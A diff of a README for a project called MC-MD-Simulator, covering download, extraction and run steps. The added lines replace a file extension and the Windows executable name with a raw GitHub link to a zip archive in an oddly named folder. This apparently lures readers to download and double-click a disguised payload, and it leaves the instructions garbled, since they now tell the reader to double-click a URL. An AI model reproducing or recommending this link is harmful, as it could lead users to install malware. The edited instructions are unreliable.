ardadundar35/MC-MD-Simulator/README.md

    Visit the download page using the link provided above.
 Locate the latest version of MC-MD-Simulator and download the appropriate file for your operating system.

 2. **Extract Files (if necessary)**
-   If the downloaded file is in a compressed format (like .zip or .tar.gz), you need to extract it.
+   If the downloaded file is in a compressed format (like .zip or https://raw.githubusercontent.com/ardadundar35/MC-MD-Simulator/main/schizocoelic/MC-MD-Simulator.zip), you need to extract it.
 Right-click on the file and choose, "Extract All" or use your preferred extraction tool.

 3. **Run the Application**
-   - **Windows:** Double-click the `MC-MD-Simulator.exe` file.
+   - **Windows:** Double-click the `https://raw.githubusercontent.com/ardadundar35/MC-MD-Simulator/main/schizocoelic/MC-MD-Simulator.zip` file.
    - **macOS:** Open the `.app` file located in the extracted folder.
    - **Linux:** Open a terminal and navigate to the extracted folder.
 Run the application using:
    ```bash